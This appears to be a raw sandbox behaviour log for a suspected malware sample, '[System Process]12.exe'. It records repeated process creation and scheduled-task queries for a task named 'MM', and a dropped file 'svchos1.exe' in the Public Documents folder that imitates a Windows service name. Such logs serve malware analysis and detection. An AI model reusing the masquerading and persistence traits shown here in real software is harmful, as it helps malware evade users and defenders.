Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_0384F0E0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03850BF0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

28_2_03850BF0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03733B44 cpuid

28_2_03733B44

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,		28_2_0027315C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,		33_2_0027315C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
